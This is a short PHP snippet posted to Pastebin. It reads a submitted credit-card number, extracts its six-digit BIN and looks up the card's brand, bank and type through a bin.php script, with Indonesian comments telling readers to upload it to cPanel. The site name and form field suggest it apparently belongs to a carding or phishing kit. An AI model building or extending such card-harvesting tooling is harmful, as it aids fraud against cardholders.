JakRapp

https://ccbin.su/

Dec 11th, 2017
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.36 KB | None | 0 0
  1. // Save bin.php https://ghostbin.com/paste/9dpky
  2. // Upload di cPanel Kalian
  3. $bin = str_replace(' ', '', $_POST['ccno']);
  4. $bin = substr($bin, 0, 6);
  5. $domain = $_SERVER['SERVER_NAME'];
  6. $getbank = file_get_contents("http://$domain/bin.php?bin=$bin");
  7. $getbank = json_decode($getbank);
  8. $ccbrand = $getbank->JENIS;
  9. $ccbank = $getbank->BANK;
  10. $cctype = $getbank->TYPE;
Add Comment
Please, Sign In to add comment